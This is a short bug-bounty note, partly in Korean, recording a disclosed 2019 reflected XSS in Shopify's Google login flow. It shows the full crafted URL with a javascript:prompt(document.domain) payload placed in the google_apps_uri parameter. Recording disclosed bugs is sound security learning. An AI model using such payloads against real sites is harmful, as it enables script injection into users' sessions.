hackerone-shopify-2019-09-n-691611
XSS while logging using Google
Google로 로그인하기 기능에 XSS가 있었다.
https://app.shopify.com/services/login/identity?destination_uuid=79b5c315-b5ac-4b19-bd33-13554433fa31&google_apps_uri=javascript:prompt(document.domain)&return_to=https%3A%2F%2Fapp.shopify.com%2Fservices%2Flogin%2Fidentity_callback%3Fshop_name%3D123ashketchum%26state%3D6a_2K0iBEBMG3sv07qFMrtzfrBFY4gZ9JsN0EJAW2Xck07xlkghl0tmZwGIvYEZ1KZw2mG4d4Omhl_h5oB_7t4dcXoS37UUOMG6f9sOr7BCKyR23PWbLpVlh4A0lMXmNuxOEUeEA55eapNpVZqT6AyfnJkQhn4K89-I5O6TVqcamtHaXWRH7b1EI6U8LvQFddrBPYniYGpggAwsFLvb5UeTvRw-fbvRditQ20YWYTK8%253D&ui_locales=en&upgradeable=true&ux=shop 와 같은 링크로 구글 로그인을 처리했는데, google_apps_uri=javascript:prompt(document.domain) 와 같이 google_apps_uri에 XSS 페이로드를 넣었다.
tags: bughunting, shopify, xss, reflected xss, wstg-inpv-01, severity none, web hacking